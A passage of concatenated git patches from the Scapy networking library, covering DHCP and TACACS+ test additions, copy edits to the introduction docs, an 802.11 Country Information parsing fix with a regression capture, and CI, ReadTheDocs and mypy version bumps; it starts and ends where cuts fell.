\x00\x01\x00\x00@\x11{\xca\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x0c\xabQ\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Scy\x11 \xc0\xa8{\x04\n\x00\x00\x01\x18\xa9\xfe\xfe\n\x00\x01\x02\xff' +s5 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("classless_static_routes", "192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"), ("rapid_commit", b""), "end"])) +assert s5 == b'E\x00\x01"\x00\x01\x00\x00@\x11{\xc8\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x0e\xaa\xfd\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Scy\x11 \xc0\xa8{\x04\n\x00\x00\x01\x18\xa9\xfe\xfe\n\x00\x01\x02P\x00\xff' = DHCP - fuzz @@ -86,11 +86,13 @@ assert p4[DHCP].options[2] == ("ipv6-only-preferred", 0xffffffff) p5 = IP(s5) assert DHCP in p5 assert p5[DHCP].options[0] == ("classless_static_routes", ["192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"]) +assert p5[DHCP].options[1] == ("rapid_commit", b"") repr(DHCP(b"\x01\x00")) assert DHCP(b"\x01\x00").options == [b"\x01\x00"] assert DHCP(b"\x28\x00").options == [("NIS_domain", b"")] assert DHCP(b"\x37\x00").options == [("param_req_list", [])] +assert DHCP(b"\x50\x00").options == [("rapid_commit", b"")] assert DHCP(b"\x79\x00").options == [("classless_static_routes", [])] assert DHCP(b"\x01\x0C\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b").options == [("subnet_mask", "0.1.2.3", "4.5.6.7", "8.9.10.11")] From cb4c7155a088b9f34d979eb3293942c93e3a62d0 Mon Sep 17 00:00:00 2001 From: ntheule <91799347+ntheule@users.noreply.github.com> Date: Fri, 10 Nov 2023 13:52:00 -0500 Subject: [PATCH 1116/1632] Intro doc edits (#4162) * Removed extra "and" * Remove misused parentheses * Consistent use of contractions in sentence * Changing to be less confusing * Fixing typos * Changes for better readability * Adding missing comma * Add missing "the" * Removing extra "the" --- doc/scapy/introduction.rst | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/doc/scapy/introduction.rst b/doc/scapy/introduction.rst index b960e789c9d..ab8b97cf1f6 100644 --- a/doc/scapy/introduction.rst +++ b/doc/scapy/introduction.rst @@ -7,7 +7,7 @@ Introduction About Scapy =========== -Scapy is a Python program that enables the user to send, sniff and dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks. +Scapy is a Python program that enables the user to send, sniff, dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks. In other words, Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. Scapy can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump, and tshark. @@ -16,38 +16,38 @@ In other words, Scapy is a powerful interactive packet manipulation program. It Scapy also performs very well on a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining techniques (VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, ...), etc. -The idea is simple. Scapy mainly does two things: sending packets and receiving answers. You define a set of packets, it sends them, receives answers, matches requests with answers and returns a list of packet couples (request, answer) and a list of unmatched packets. This has the big advantage over tools like Nmap or hping that an answer is not reduced to (open/closed/filtered), but is the whole packet. +The idea is simple. Scapy mainly does two things: sending packets and receiving answers. You define a set of packets, it sends them, receives answers, matches requests with answers and returns a list of packet couples (request, answer) and a list of unmatched packets. This has the big advantage over tools like Nmap or hping that an answer is not reduced to open, closed, or filtered, but is the whole packet. -On top of this can be build more high level functions, for example, one that does traceroutes and give as a result only the start TTL of the request and the source IP of the answer. One that pings a whole network and gives the list of machines answering. One that does a portscan and returns a LaTeX report. +On top of this can be built more high level functions. For example, one that does traceroutes and give as a result only the start TTL of the request and the source IP of the answer. One that pings a whole network and gives the list of machines answering. One that does a portscan and returns a LaTeX report. What makes Scapy so special =========================== -First, with most other networking tools, you won't build something the author did not imagine. These tools have been built for a specific goal and can't deviate much from it. For example, an ARP cache poisoning program won't let you use double 802.1q encapsulation. Or try to find a program that can send, say, an ICMP packet with padding (I said *padding*, not *payload*, see?). In fact, each time you have a new need, you have to build a new tool. +First, with most other networking tools, you won't build something the author didn't imagine. These tools have been built for a specific goal and can't deviate much from it. For example, an ARP cache poisoning program won't let you use double 802.1q encapsulation. Or try to find a program that can send, say, an ICMP packet with padding (I said *padding*, not *payload*, see?). In fact, each time you have a new need, you have to build a new tool. Second, they usually confuse decoding and interpreting. Machines are good at decoding and can help human beings with that. Interpretation is reserved for human beings. Some programs try to mimic this behavior. For instance they say "*this port is open*" instead of "*I received a SYN-ACK*". Sometimes they are right. Sometimes not. It's easier for beginners, but when you know what you're doing, you keep on trying to deduce what really happened from the program's interpretation to make your own, which is hard because you lost a big amount of information. And you often end up using ``tcpdump -xX`` to decode and interpret what the tool missed. -Third, even programs which only decode do not give you all the information they received. The network's vision they give you is the one their author thought was sufficient. But it is not complete, and you have a bias. For instance, do you know a tool that reports the Ethernet padding? +Third, even programs which only decode do not give you all the information they received. The vision of the network they give you is the one their author thought was sufficient. But it is not complete, and you have a bias. For instance, do you know a tool that reports the Ethernet padding? -Scapy tries to overcome those problems. It enables you to build exactly the packets you want. Even if I think stacking a 802.1q layer on top of TCP has no sense, it may have some for somebody else working on some product I don't know. Scapy has a flexible model that tries to avoid such arbitrary limits. You're free to put any value you want in any field you want and stack them like you want. You're an adult after all. +Scapy tries to overcome those problems. It enables you to build exactly the packets you want. Even if I think stacking an 802.1q layer on top of TCP has no sense, it may have some for somebody else working on some product I don't know. Scapy has a flexible model that tries to avoid such arbitrary limits. You're free to put any value you want in any field you want and stack them like you want. You're an adult after all. In fact, it's like building a new tool each time, but instead of dealing with a hundred line C program, you only write 2 lines of Scapy. -After a probe (scan, traceroute, etc.) Scapy always gives you the full decoded packets from the probe, before any interpretation. That means that you can probe once and interpret many times, ask for a traceroute and look at the padding for instance. +After a probe (scan, traceroute, etc.) Scapy always gives you the full decoded packets from the probe, before any interpretation. That means that you can probe once and interpret many times. Ask for a traceroute and look at the padding, for instance. Fast packet design ------------------ Other tools stick to the **program-that-you-run-from-a-shell** paradigm. The result is an awful syntax to describe a packet. For these tools, the solution adopted uses a higher but less powerful description, in the form of scenarios imagined by the tool's author. As an example, only the IP address must be given to a port scanner to trigger the **port scanning** scenario. Even if the scenario is tweaked a bit, you still are stuck to a port scan. -Scapy's paradigm is to propose a Domain Specific Language (DSL) that enables a powerful and fast description of any kind of packet. Using the Python syntax and a Python interpreter as the DSL syntax and interpreter has many advantages: there is no need to write a separate interpreter, users don't need to learn yet another language and they benefit from a complete, concise and very powerful language. +Scapy's paradigm is to propose a Domain Specific Language (DSL) that enables a powerful and fast description of any kind of packet. Using the Python syntax and a Python interpreter as the DSL syntax and interpreter has many advantages: there is no need to write a separate interpreter, users don't need to learn yet another language, and they benefit from a complete, concise, and very powerful language. -Scapy enables the user to describe a packet or set of packets as layers that are stacked one upon another. Fields of each layer have useful default values that can be overloaded. Scapy does not oblige the user to use predetermined methods or templates. This alleviates the requirement of writing a new tool each time a different scenario is required. In C, it may take an average of 60 lines to describe a packet. With Scapy, the packets to be sent may be described in only a single line with another line to print the result. 90\% of the network probing tools can be rewritten in 2 lines of Scapy. +Scapy enables the user to describe a packet or set of packets as layers that are stacked one upon another. Fields of each layer have useful default values that can be overloaded. Scapy does not oblige the user to use predetermined methods or templates. This alleviates the requirement of writing a new tool each time a different scenario is required. In C, it may take an average of 60 lines to describe a packet. With Scapy, the packets to be sent may be described in only a single line, with another line to print the result. 90\% of network probing tools can be rewritten in 2 lines of Scapy. Probe once, interpret many -------------------------- -Network discovery is blackbox testing. When probing a network, many stimuli are sent while only a few of them are answered. If the right stimuli are chosen, the desired information may be obtained by the responses or the lack of responses. Unlike many tools, Scapy gives all the information, i.e. all the stimuli sent and all the responses received. Examination of this data will give the user the desired information. When the dataset is small, the user can just dig for it. In other cases, the interpretation of the data will depend on the point of view taken. Most tools choose the viewpoint and discard all the data not related to that point of view. Because Scapy gives the complete raw data, that data may be used many times allowing the viewpoint to evolve during analysis. For example, a TCP port scan may be probed and the data visualized as the result of the port scan. The data could then also be visualized with respect to the TTL of response packet. A new probe need not be initiated to adjust the viewpoint of the data. +Network discovery is blackbox testing. When probing a network, many stimuli are sent, while only a few of them are answered. If the right stimuli are chosen, the desired information may be obtained by the responses or the lack of responses. Unlike many tools, Scapy gives all the information, i.e. all the stimuli sent and all the responses received. Examination of this data will give the user the desired information. When the dataset is small, the user can just dig for it. In other cases, the interpretation of the data will depend on the point of view taken. Most tools choose the viewpoint and discard all the data not related to that point of view. Because Scapy gives the complete raw data, that data may be used many times allowing the viewpoint to evolve during analysis. For example, a TCP port scan may be probed and the data visualized as the result of the port scan. The data could then also be visualized with respect to the TTL of the response packet. A new probe need not be initiated to adjust the viewpoint of the data. .. image:: graphics/scapy-concept.* :scale: 80 @@ -55,9 +55,9 @@ Network discovery is blackbox testing. When probing a network, many stimuli are Scapy decodes, it does not interpret ------------------------------------ -A common problem with network probing tools is they try to interpret the answers received instead of only decoding and giving facts. Reporting something like **Received a TCP Reset on port 80** is not subject to interpretation errors. Reporting **Port 80 is closed** is an interpretation that may be right most of the time but wrong in some specific contexts the tool's author did not imagine. For instance, some scanners tend to report a filtered TCP port when they receive an ICMP destination unreachable packet. This may be right, but in some cases, it means the packet was not filtered by the firewall but rather there was no host to forward the packet to. +A common problem with network probing tools is they try to interpret the answers received instead of only decoding and giving facts. Reporting something like **Received a TCP Reset on port 80** is not subject to interpretation errors. Reporting **Port 80 is closed** is an interpretation that may be right most of the time but wrong in some specific contexts the tool's author did not imagine. For instance, some scanners tend to report a filtered TCP port when they receive an ICMP destination unreachable packet. This may be right, but in some cases, it means the packet was not filtered by the firewall, but rather there was no host to forward the packet to. -Interpreting results can help users that don't know what a port scan is but it can also make more harm than good, as it injects bias into the results. What can tend to happen is that so that they can do the interpretation themselves, knowledgeable users will try to reverse engineer the tool's interpretation to derive the facts that triggered that interpretation. Unfortunately, much information is lost in this operation. +Interpreting results can help users that don't know what a port scan is, but it can also make more harm than good, as it injects bias into the results. What can tend to happen is that knowledgeable users will try to reverse engineer the tool's interpretation to derive the facts that triggered that interpretation, so that they can do the interpretation themselves. Unfortunately, much information is lost in this operation. Quick demo ========== From c4b6ef76ee3a1c00190008849f676b2bd212dca8 Mon Sep 17 00:00:00 2001 From: gidder Date: Thu, 2 Nov 2023 19:52:57 +0100 Subject: [PATCH 1117/1632] tacacs: support unencrypted packets --- scapy/contrib/tacacs.py | 7 +++---- test/contrib/tacacs.uts | 16 ++++++++++++++++ 2 files changed, 19 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/tacacs.py b/scapy/contrib/tacacs.py index ed1ca0640be..814136dd87d 100755 --- a/scapy/contrib/tacacs.py +++ b/scapy/contrib/tacacs.py @@ -362,7 +362,8 @@ def post_dissect(self, pay): if self.flags == 0: pay = obfuscate(pay, SECRET, self.session_id, self.version, self.seq) # noqa: E501 - return pay + + return pay class TacacsHeader(TacacsClientPacket): @@ -420,11 +421,9 @@ def post_build(self, p, pay): p = p[:-4] + struct.pack('!I', len(pay)) if self.flags == 0: - pay = obfuscate(pay, SECRET, self.session_id, self.version, self.seq) # noqa: E501 - return p + pay - return p + return p + pay def hashret(self): return struct.pack('I', self.session_id) diff --git a/test/contrib/tacacs.uts b/test/contrib/tacacs.uts index 011e78bf706..94f07ad6a42 100644 --- a/test/contrib/tacacs.uts +++ b/test/contrib/tacacs.uts @@ -1,3 +1,8 @@ +# TACACS+ related regression tests +# +# Type the following command to launch the tests: +# $ test/run_tests -P "load_contrib('tacacs')" -t test/contrib/tacacs.uts + + Tacacs+ header = default instantiation @@ -188,3 +193,14 @@ scapy.contrib.tacacs.SECRET = 'foobar' pkt = Ether(b'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x009\x00\x01\x00\x00@\x06|\xbc\x7f\x00\x00\x01\x7f\x00\x00\x01\x001\x001\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00/,\x00\x00\xc0\x03\x02\x00\x1aM\x05\r\x00\x00\x00\x05S)\x9b\xb4\x92') pkt.status == 1 ++ Unencrypted Authentication + += instantiation + +pkt = IP()/TCP(dport=49)/TacacsHeader(seq=1, flags=1, session_id=2424164486, length=28)/TacacsAuthenticationStart(user_len=5, port_len=4, rem_addr_len=11, data_len=0, user='scapy', port='tty2', rem_addr='172.10.10.1') +raw(pkt) == b"E\x00\x00P\x00\x01\x00\x00@\x06|\xa5\x7f\x00\x00\x01\x7f\x00\x00\x01\x001\x001\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00sG\x00\x00\xc0\x01\x01\x01\x90}\xd0\x86\x00\x00\x00\x1c\x01\x01\x01\x01\x05\x04\x0b\x00scapytty2172.10.10.1" + += dissection + +pkt = Ether(b'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00P\x00\x01\x00\x00@\x06|\xa5\x7f\x00\x00\x01\x7f\x00\x00\x01\x001\x001\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00sG\x00\x00\xc0\x01\x01\x01\x90}\xd0\x86\x00\x00\x00\x1c\x01\x01\x01\x01\x05\x04\x0b\x00scapytty2172.10.10.1') +pkt.user == b'scapy' and pkt.port == b'tty2' From 42badf86db5f9d334f4333306df445094b71e4ad Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 12 Nov 2023 15:50:38 +0100 Subject: [PATCH 1118/1632] ReadTheDocs: fix displayed Scapy version --- .readthedocs.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/.readthedocs.yml b/.readthedocs.yml index ecf566c59b4..026135b6fc7 100644 --- a/.readthedocs.yml +++ b/.readthedocs.yml @@ -12,7 +12,13 @@ build: os: ubuntu-20.04 tools: python: "3.9" + # To show the correct Scapy version, we must unshallow + # https://docs.readthedocs.io/en/stable/build-customization.html#unshallow-git-clone + jobs: + post_checkout: + - git fetch --unshallow || true +# https://docs.readthedocs.io/en/stable/config-file/v2.html#python python: install: - method: pip From bc6eb8f37886ccdbc6d17415701f8d7b9fb3fb8b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 12 Nov 2023 16:53:08 +0100 Subject: [PATCH 1119/1632] Update build versions --- .github/workflows/unittests.yml | 21 +++++++++++---------- .readthedocs.yml | 4 ++-- 2 files changed, 13 insertions(+), 12 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 01835687ee8..5296d7142f2 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -20,7 +20,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v4 with: - python-version: "3.10" + python-version: "3.11" - name: Install tox run: pip install tox - name: Run flake8 tests @@ -32,15 +32,16 @@ jobs: - name: Run gitarchive check run: tox -e gitarchive docs: + # 'runs-on' and 'python-version' should match the ones defined in .readthedocs.yml name: Build doc - runs-on: ubuntu-latest + runs-on: ubuntu-22.04 steps: - name: Checkout Scapy uses: actions/checkout@v3 - name: Setup Python uses: actions/setup-python@v4 with: - python-version: "3.10" + python-version: "3.12" - name: Install tox run: pip install tox - name: Build docs @@ -69,7 +70,7 @@ jobs: fail-fast: false matrix: os: [ubuntu-latest] - python: ["3.7", "3.8", "3.9", "3.10"] + python: ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] mode: [non_root] installmode: [''] flags: [" -K scanner"] @@ -77,7 +78,7 @@ jobs: include: # Linux root tests - os: ubuntu-latest - python: "3.10" + python: "3.11" mode: root flags: " -K scanner" # PyPy tests: root only @@ -87,18 +88,18 @@ jobs: flags: " -K scanner" # Libpcap test - os: ubuntu-latest - python: "3.10" + python: "3.11" mode: root installmode: 'libpcap' flags: " -K scanner" # macOS tests - os: macos-12 - python: "3.10" + python: "3.11" mode: both flags: " -K scanner" # Scanner tests - os: ubuntu-latest - python: "3.10" + python: "3.11" mode: root allow-failure: 'true' flags: " -k scanner" @@ -108,7 +109,7 @@ jobs: allow-failure: 'true' flags: " -k scanner" - os: macos-12 - python: "3.10" + python: "3.11" mode: both allow-failure: 'true' flags: " -k scanner" @@ -138,7 +139,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v4 with: - python-version: "3.10" + python-version: "3.11" - name: Install tox run: pip install tox # pyca/cryptography's CI installs cryptography diff --git a/.readthedocs.yml b/.readthedocs.yml index 026135b6fc7..6c006d87efd 100644 --- a/.readthedocs.yml +++ b/.readthedocs.yml @@ -9,9 +9,9 @@ formats: - pdf build: - os: ubuntu-20.04 + os: ubuntu-22.04 tools: - python: "3.9" + python: "3.12" # To show the correct Scapy version, we must unshallow # https://docs.readthedocs.io/en/stable/build-customization.html#unshallow-git-clone jobs: From a0dc5025f2c5039600ec54872a8209a94d4563a3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 12 Nov 2023 16:55:09 +0100 Subject: [PATCH 1120/1632] Support 3.11 and 3.12 --- pyproject.toml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/pyproject.toml b/pyproject.toml index 15d52fc90eb..0aa486a4795 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -33,6 +33,8 @@ classifiers = [ "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", + "Programming Language :: Python :: 3.11", + "Programming Language :: Python :: 3.12", "Topic :: Security", "Topic :: System :: Networking", "Topic :: System :: Networking :: Monitoring", From 0d9cca1a89f5f426d7c05236f6484b940690aef7 Mon Sep 17 00:00:00 2001 From: Gilad Beeri Date: Tue, 14 Nov 2023 01:49:33 +0200 Subject: [PATCH 1121/1632] 802.11: support badly implemented Country Information padding (#4133) * fixed parsing of 802.11 frames with Country Information element tags that don't comply with the standard by avoiding the necessary padding byte that should make the tag length even * Fix PEP8 --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/dot11.py | 9 ++++++++- test/regression.uts | 18 ++++++++++++++++++ 2 files changed, 26 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 1cc38b6f8e9..8c95a019c6f 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1282,7 +1282,14 @@ class Dot11EltCountry(Dot11Elt): # When this extension is last, padding appears to be omitted ConditionalField( ByteField("pad", 0), - lambda pkt: (len(pkt.descriptors) + 1) % 2 + # The length should be 3 bytes per each triplet, and 3 bytes for the + # country_string field. The standard dictates that the element length + # must be even, so if the result is odd, add a padding byte. + # Some transmitters don't comply with the standard, so instead of assuming + # the length, we test whether there is a padding byte. + # Some edge cases are still not covered, for example, if the tag length + # (pkt.len) is an arbitrary number. + lambda pkt: ((len(pkt.descriptors) + 1) % 2) if pkt.len is None else (pkt.len % 3) # noqa: E501 ) ] diff --git a/test/regression.uts b/test/regression.uts index b4ec23cb79f..7409ec29873 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1585,6 +1585,24 @@ beacon = frame.getlayer(5) ssid = beacon.network_stats()['ssid'] assert ssid == "ROUTE-821E295" += SSID is parsed properly even when the Country Information Tag Element has an odd length (not complying with the standard) and a missing pad byte +~ Missing Pad Byte in Country Info +# A regression test for https://github.com/secdev/scapy/pull/2685. +# https://github.com/secdev/scapy/issues/4132 describes a packet with +# a Country Information element tag that has an odd length, even though it's against the standard. +# The transmitter should have added a padding byte to make the length even, but it didn't. +# The effect on scapy used to be improper parsing of the next tag elements, causing the SSID to be overridden. +# This test checks the SSID is parsed properly. +from io import BytesIO +pcapfile = BytesIO(b'\n\r\r\n\x80\x00\x00\x00M<+\x1a\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x10\x00Linux 6.1.21-v8+\x04\x00E\x00Dumpcap (Wireshark) 3.4.10 (Git v3.4.10 packaged as 3.4.10-0+deb11u1)\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x7f\x00\x00\x00\x00\x04\x00\x00\x02\x00\x05\x00wifi2\x00\x00\x00\t\x00\x01\x00\t\x00\x00\x00\x0c\x00\x10\x00Linux 6.1.21-v8+\x00\x00\x00\x00@\x00\x00\x00\x06\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x00c\xd3\x87\x17\xe3c5\x82\x90\x01\x00\x00\x90\x01\x00\x00\x00\x00 \x00\xae@\x00\xa0 \x08\x00\xa0 \x08\x00\x00\x10\x0cd\x14@\x01\xa9\x00\x0c\x00\x00\x00\xa6\x00\xa8\x01\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\x02\xbf\xaf\x9f\xf8\x07\x02\xbf\xaf\x9f\xf8\x070\x96[p\xdcM\x06\x00\x00\x00d\x00\x11\x00\x00\x00\x01\x08\x8c\x12\x98$\xb0H`l\x03\x01,\x05\x04\x00\x01\x00\x00\x07QUS \x01\r\x80$\x01\x80(\x01\x80,\x01\x800\x01\x804\x01\x808\x01\x80<\x01\x80@\x01\x80d\x01\x80h\x01\x80l\x01\x80p\x01\x80t\x01\x80x\x01\x80|\x01\x80\x80\x01\x80\x84\x01\x80\x88\x01\x80\x8c\x01\x80\x90\x01\x80\x95\x01\x80\x99\x01\x80\x9d\x01\x80\xa1\x01\x80\xa5\x01\x800\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x0c\x00;\x02s\x00-\x1a,\t\x13\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00,\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16,\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x18\x00P\xf2\x02\x01\x01\x81\x00\x03\xa4\x00\x00\'\xa4\x00\x00BC]\x00a\x11.\x00\xdd;\x00P\xf2\x04\x10J\x00\x01\x10\x10D\x00\x01\x02\x10I\x00\x06\x007*\x00\x01 \x10\x11\x00\x1358" Hisense Roku TV\x10T\x00\x08\x00\x07\x00P\xf2\x04\x00\x01\xdd\x16\xc8:k\x01\x01\x1048<@dhlptx|\x80\x84\x88\x8c\x90\xdd\x12Po\x9a\t\x02\x02\x00!\x0b\x03\x06\x00\x02\xbf\xaf\x9f\xf8\x07\xdd\rPo\x9a\n\x00\x00\x06\x01\x11\x1cD\x002\xf5N\xfbh\xb0\x01\x00\x00') +pktpcap = rdpcap(pcapfile) +frame = pktpcap[0] +beacon = frame.getlayer(4) +stats = beacon.network_stats() +ssid = stats['ssid'] +assert ssid == "" +country = stats['country'] +assert country == 'US' ############ ############ From 78f153e5617f134e8cb6d2df9f122fc4ad595fae Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 13 Nov 2023 23:04:27 +0100 Subject: [PATCH 1122/1632] Bump mypy to 1.7.0 and tox --- .config/ci/test.sh | 6 +- .github/workflows/unittests.yml | 16 +++--- pyproject.toml | 2 +- scapy/asn1fields.py | 8 +-- scapy/compat.py | 7 ++- scapy/config.py | 99 +++++++++++++++++---------------- scapy/packet.py | 10 ++-- scapy/plist.py | 2 +- scapy/themes.py | 84 +++++++++++++++++----------- scapy/utils.py | 36 +++++++----- tox.ini | 29 +++++----- 11 files changed, 166 insertions(+), 133 deletions(-) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 30e43fa2a8d..93c1c79a24d 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -84,13 +84,13 @@ if [ -z $TOXENV ] then case ${SCAPY_TOX_CHOSEN} in both) - export TOXENV="${TESTVER}_non_root,${TESTVER}_root" + export TOXENV="${TESTVER}-non_root,${TESTVER}-root" ;; root) - export TOXENV="${TESTVER}_root" + export TOXENV="${TESTVER}-root" ;; *) - export TOXENV="${TESTVER}_non_root" + export TOXENV="${TESTVER}-non_root" ;; esac fi diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 5296d7142f2..a02cd99ae8a 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -20,7 +20,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v4 with: - python-version: "3.11" + python-version: "3.12" - name: Install tox run: pip install tox - name: Run flake8 tests @@ -55,7 +55,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v4 with: - python-version: "3.11" + python-version: "3.12" - name: Install tox run: pip install tox - name: Run mypy @@ -78,7 +78,7 @@ jobs: include: # Linux root tests - os: ubuntu-latest - python: "3.11" + python: "3.12" mode: root flags: " -K scanner" # PyPy tests: root only @@ -88,18 +88,18 @@ jobs: flags: " -K scanner" # Libpcap test - os: ubuntu-latest - python: "3.11" + python: "3.12" mode: root installmode: 'libpcap' flags: " -K scanner" # macOS tests - os: macos-12 - python: "3.11" + python: "3.12" mode: both flags: " -K scanner" # Scanner tests - os: ubuntu-latest - python: "3.11" + python: "3.12" mode: root allow-failure: 'true' flags: " -k scanner" @@ -109,7 +109,7 @@ jobs: allow-failure: 'true' flags: " -k scanner" - os: macos-12 - python: "3.11" + python: "3.12" mode: both allow-failure: 'true' flags: " -k scanner" @@ -139,7 +139,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v4 with: - python-version: "3.11" + python-version: "3.12" - name: Install tox run: pip install tox # pyca/cryptography's CI installs cryptography diff --git a/pyproject.toml b/pyproject.toml index 0aa486a4795..92f1734adc9 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -57,7 +57,7 @@ all = [ "cryptography>=2.0", "matplotlib", ] -docs = [ +doc = [ "sphinx>=7.0.0", "sphinx_rtd_theme>=1.3.0", "tox>=3.0.0", diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 39573f9124d..6cd782a9ed8 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -452,7 +452,7 @@ def is_empty(self, pkt): def get_fields_list(self): # type: () -> List[ASN1F_field[Any, Any]] - return reduce(lambda x, y: x + y.get_fields_list(), # type: ignore + return reduce(lambda x, y: x + y.get_fields_list(), self.seq, []) def m2i(self, pkt, s): @@ -497,7 +497,7 @@ def dissect(self, pkt, s): def build(self, pkt): # type: (ASN1_Packet) -> bytes - s = reduce(lambda x, y: x + y.build(pkt), # type: ignore + s = reduce(lambda x, y: x + y.build(pkt), self.seq, b"") return super(ASN1F_SEQUENCE, self).i2m(pkt, s) @@ -506,7 +506,7 @@ class ASN1F_SET(ASN1F_SEQUENCE): ASN1_tag = ASN1_Class_UNIVERSAL.SET -_SEQ_T = Union['ASN1_Packet', Type[ASN1F_field], 'ASN1F_PACKET'] +_SEQ_T = 